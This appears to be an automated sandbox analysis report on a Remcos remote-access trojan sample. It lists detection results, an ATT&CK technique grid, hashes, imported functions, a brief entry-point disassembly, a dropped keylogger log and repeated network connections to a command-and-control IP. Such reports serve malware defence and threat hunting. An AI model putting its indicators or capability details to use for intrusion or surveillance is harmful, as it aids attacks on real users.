                        SMB/Windows Admin Shares3
                        Clipboard Data
                        1
                        Remote Access Software
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        NTDS2
                        File and Directory Discovery
                        Distributed Component Object ModelInput Capture1
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                        Process Injection
                        1
                        Virtualization/Sandbox Evasion
                        LSA Secrets22
                        System Information Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Access Token Manipulation
                        Cached Domain Credentials21
                        Security Software Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Process Injection
                        DCSync1
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        NssBkEQKsI.exe76%VirustotalBrowse
                        NssBkEQKsI.exe96%ReversingLabsWin32.Backdoor.Remcos
                        NssBkEQKsI.exe100%AviraBDS/Backdoor.Gen
                        NssBkEQKsI.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No contacted domains info
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpNssBkEQKsI.exefalse
                          high
                          http://geoplugin.net/json.gp/CNssBkEQKsI.exefalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            192.210.150.26
                            unknownUnited States
                            36352AS-COLOCROSSINGUStrue
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1588307
                            Start date and time:2025-01-10 23:45:46 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 19s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:11
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:NssBkEQKsI.exe
                            renamed because original name is a hash value
                            Original Sample Name:e9077ad335bfe27a3217406b06411f96d66e7af4bd59e21ba88f1b6c59cd24b5.exe
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@1/1@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 34
                            • Number of non-executed functions: 207
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for sample files taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50, 4.245.163.56
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            TimeTypeDescription
                            17:47:09API Interceptor6278492x Sleep call for process: NssBkEQKsI.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            192.210.150.26l1QC9H0SNR.exeGet hashmaliciousRemcosBrowse
                              bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                FACTURA.xlsxGet hashmaliciousRemcosBrowse
                                  7056ZCiFdE.exeGet hashmaliciousRemcosBrowse
                                    uIarPolvHR.exeGet hashmaliciousRemcosBrowse
                                      IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                        z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                            Rgh99876k7e.exeGet hashmaliciousRemcosBrowse
                                              SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AS-COLOCROSSINGUSl1QC9H0SNR.exeGet hashmaliciousRemcosBrowse
                                                • 192.210.150.26
                                                MLxloAVuCZ.exeGet hashmaliciousRemcosBrowse
                                                • 192.3.64.152
                                                bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                • 192.210.150.26
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 192.3.27.144
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 192.3.27.144
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 192.3.27.144
                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                • 23.95.117.229
                                                sweetnessgoodforgreatnessthingswithgood.tIF.vbsGet hashmaliciousSmokeLoaderBrowse
                                                • 192.3.27.144
                                                begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                • 192.3.27.144
                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                • 192.3.27.144
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\NssBkEQKsI.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):232
                                                Entropy (8bit):3.459637546109707
                                                Encrypted:false
                                                SSDEEP:6:Mls6UlSg5YcIeeDAlOWA7DxbN2fxl3lCm0v:t6UlPec0WItN2LYl
                                                MD5:B62D0D360B6DC25A80CBA07BA47FFE84
                                                SHA1:D11E433CEDFCFFA1EB1BBD2EDC1768D3023448DC
                                                SHA-256:3C7A7C1D16D5D676B1D1442E405FC3109BB124B6489D6B7D43A5716C16CF8D8C
                                                SHA-512:BE0AB0C3A3AD9ABDD66676187D1372C5D5BB87CBAABF50E00A40E025853AEBF817EC2714F87A90BAB375F9D0A05DC84E0C7FB6C9AB1867B14BF3892BCD0D731C
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                Reputation:low
                                                Preview:....[.2.0.2.5./.0.1./.1.0. .1.7.:.4.6.:.3.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.1.5.7.9. .m.i.n.u.t.e.s. .}.....
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.583894042568708
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:NssBkEQKsI.exe
                                                File size:492'544 bytes
                                                MD5:575d16384315352aa0a0b0eab3a62b6c
                                                SHA1:2bd99b62a965febf54c0e72a1afee93c12f135b6
                                                SHA256:e9077ad335bfe27a3217406b06411f96d66e7af4bd59e21ba88f1b6c59cd24b5
                                                SHA512:5ae0f3b0d1fb8435fce9baf5d95d7ccaa4e3af383db52dacbd3ba7328bca386508d2b7dbd65fd42b938004c6f1213e75c712f02ce06eb50c71b24bf35e40c5d4
                                                SSDEEP:12288:VuD09AUkNIGBYYv4eK13x13nZHSRVMf139F5wIB7+IwtHwBtVxbesvZDSq+DY:409AfNIEYsunZvZ19ZBs
                                                TLSH:A7A4BF01B6D2C072D57625300D26E775DEBDBD212835897BB3DA1D67FE30180E63AAB2
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H....*..H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H.
                                                Icon Hash:95694d05214c1b33
                                                Entrypoint:0x433b3a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6724916B [Fri Nov 1 08:29:31 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:e77512f955eaf60ccff45e02d69234de
                                                Instruction
                                                call 00007FD0F8DE9363h
                                                jmp 00007FD0F8DE8CBFh
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000324h
                                                push ebx
                                                push 00000017h
                                                call 00007FD0F8E0B199h
                                                test eax, eax
                                                je 00007FD0F8DE8E47h
                                                mov ecx, dword ptr [ebp+08h]
                                                int 29h
                                                push 00000003h
                                                call 00007FD0F8DE9004h
                                                mov dword ptr [esp], 000002CCh
                                                lea eax, dword ptr [ebp-00000324h]
                                                push 00000000h
                                                push eax
                                                call 00007FD0F8DEB31Bh
                                                add esp, 0Ch
                                                mov dword ptr [ebp-00000274h], eax
                                                mov dword ptr [ebp-00000278h], ecx
                                                mov dword ptr [ebp-0000027Ch], edx
                                                mov dword ptr [ebp-00000280h], ebx
                                                mov dword ptr [ebp-00000284h], esi
                                                mov dword ptr [ebp-00000288h], edi
                                                mov word ptr [ebp-0000025Ch], ss
                                                mov word ptr [ebp-00000268h], cs
                                                mov word ptr [ebp-0000028Ch], ds
                                                mov word ptr [ebp-00000290h], es
                                                mov word ptr [ebp-00000294h], fs
                                                mov word ptr [ebp-00000298h], gs
                                                pushfd
                                                pop dword ptr [ebp-00000264h]
                                                mov eax, dword ptr [ebp+04h]
                                                mov dword ptr [ebp-0000026Ch], eax
                                                lea eax, dword ptr [ebp+04h]
                                                mov dword ptr [ebp-00000260h], eax
                                                mov dword ptr [ebp-00000324h], 00010001h
                                                mov eax, dword ptr [eax-04h]
                                                push 00000050h
                                                mov dword ptr [ebp-00000270h], eax
                                                lea eax, dword ptr [ebp-58h]
                                                push 00000000h
                                                push eax
                                                call 00007FD0F8DEB291h
                                                Programming Language:
                                                • [C++] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6e0200x104.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x4890.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b0000x3b80.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x6c5100x38.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x6c5e80x18.rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6c5480x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x570000x4f4.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x55f1d0x5600030cda225e02a0d4dab478a6c7c094860False0.5738610555959303data6.62127843313247IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x570000x18b000x18c009800e1a5325bb58aa054e318c8bb055aFalse0.49812578914141414OpenPGP Secret Key Version 65.758930104385571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x700000x5d6c0xe0006414e748130e7e668ba2ba172d63448False0.22684151785714285data3.093339598098017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x760000x48900x4a006f98f1c1b0dd095eadbc3e259ca5c4b3False0.251953125data3.8125548553131323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x7b0000x3b800x3c003a880743591ae3410d0dc26d7322ddd0False0.7569661458333333data6.695050823503309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x7618c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                                RT_ICON0x765f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                                RT_ICON0x76f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                                RT_ICON0x780240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                                RT_RCDATA0x7a5cc0x281DOS executable (COM, 0x8C-variant)1.0171606864274572
                                                RT_GROUP_ICON0x7a8500x3edataEnglishUnited States0.8064516129032258
                                                DLLImport
                                                KERNEL32.dllExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile
                                                USER32.dllDefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon
                                                GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject
                                                ADVAPI32.dllLookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW
                                                SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                                ole32.dllCoInitializeEx, CoGetObject, CoUninitialize
                                                SHLWAPI.dllStrToIntA, PathFileExistsW, PathFileExistsA
                                                WINMM.dllmciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW
                                                WS2_32.dllsend, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname
                                                urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                                gdiplus.dllGdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage
                                                WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 10, 2025 23:46:38.031136036 CET497063678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:38.036082983 CET367849706192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:38.036259890 CET497063678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:38.038804054 CET497063678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:38.047276974 CET367849706192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:39.567477942 CET367849706192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:39.567603111 CET497063678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:39.567603111 CET497063678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:39.572469950 CET367849706192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:40.582412958 CET497083678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:40.587259054 CET367849708192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:40.587346077 CET497083678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:40.587852955 CET497083678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:40.592631102 CET367849708192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:42.096833944 CET367849708192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:42.096915007 CET497083678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:42.097011089 CET497083678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:42.102679014 CET367849708192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:43.098086119 CET497193678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:43.104121923 CET367849719192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:43.104208946 CET497193678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:43.104614973 CET497193678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:43.109503031 CET367849719192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:44.531996012 CET367849719192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:44.532952070 CET497193678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:44.533000946 CET497193678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:44.537789106 CET367849719192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:45.535516024 CET497353678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:45.541691065 CET367849735192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:45.541893959 CET497353678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:45.542181015 CET497353678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:45.546968937 CET367849735192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:46.989403963 CET367849735192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:46.989615917 CET497353678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:46.989691973 CET497353678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:46.994519949 CET367849735192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:48.004884005 CET497503678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:48.009807110 CET367849750192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:48.009885073 CET497503678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:48.010271072 CET497503678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:48.015166044 CET367849750192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:49.419356108 CET367849750192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:49.419420958 CET497503678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:49.419466019 CET497503678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:49.424205065 CET367849750192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:50.426141977 CET497693678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:50.431013107 CET367849769192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:50.431096077 CET497693678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:50.431591988 CET497693678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:50.436439037 CET367849769192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:51.844594002 CET367849769192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:51.844741106 CET497693678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:51.844841003 CET497693678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:51.849664927 CET367849769192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:52.848347902 CET497823678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:52.853322029 CET367849782192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:52.853424072 CET497823678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:52.853806973 CET497823678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:52.858674049 CET367849782192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:54.309370995 CET367849782192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:54.309540987 CET497823678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:54.309633017 CET497823678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:54.314434052 CET367849782192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:55.317298889 CET497983678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:55.322216988 CET367849798192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:55.322326899 CET497983678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:55.322659016 CET497983678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:55.327406883 CET367849798192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:56.751216888 CET367849798192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:56.751283884 CET497983678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:56.751832008 CET497983678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:56.756623983 CET367849798192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:57.754551888 CET498173678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:57.759459019 CET367849817192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:57.759546995 CET498173678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:57.759934902 CET498173678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:57.764702082 CET367849817192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:59.154460907 CET367849817192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:46:59.154527903 CET498173678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:59.154570103 CET498173678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:46:59.159331083 CET367849817192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:00.161139965 CET498333678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:00.166003942 CET367849833192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:00.166124105 CET498333678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:00.166605949 CET498333678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:00.171451092 CET367849833192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:01.577770948 CET367849833192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:01.577838898 CET498333678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:01.577886105 CET498333678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:01.582719088 CET367849833192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:02.582791090 CET498493678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:02.587583065 CET367849849192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:02.587663889 CET498493678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:02.588216066 CET498493678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:02.592972040 CET367849849192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:03.982429028 CET367849849192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:03.982548952 CET498493678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:03.982548952 CET498493678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:47:03.987339973 CET367849849192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:47:04.989109039 CET498643678192.168.2.10192.210.150.26
